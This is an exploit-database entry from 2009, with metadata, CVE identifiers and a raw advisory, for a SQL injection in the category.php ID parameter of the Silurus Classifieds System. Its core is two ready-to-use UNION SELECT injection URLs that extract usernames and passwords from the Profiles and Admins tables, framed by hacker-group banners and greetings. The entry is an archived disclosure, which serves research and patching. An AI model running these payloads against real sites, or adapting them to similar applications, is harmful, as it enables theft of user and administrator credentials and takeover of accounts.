Silurus Classifieds System - 'category.php' SQL Injection

Author: Mr.SQL
type: webapps
platform: php
port: 
date_added: 2009-08-27  
date_updated:   
verified: 1  
codes: OSVDB-57914;CVE-2009-3117;OSVDB-57808;CVE-2009-3082  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9538.txt  
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( category.php ID )
##
## Silurus Classifieds System
##
## http://snowhall.com/silurus
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,NickName,Password),0,0,0,0,0,0+FROM+Profiles--
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,Name,Password),0,0,0,0,0,0+FROM+Admins--
##
########################
########################

Download ::  http://snowhall.com/downloads/silurus.php

#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-

:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: User-Ma$keN :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################

# milw0rm.com [2009-08-28]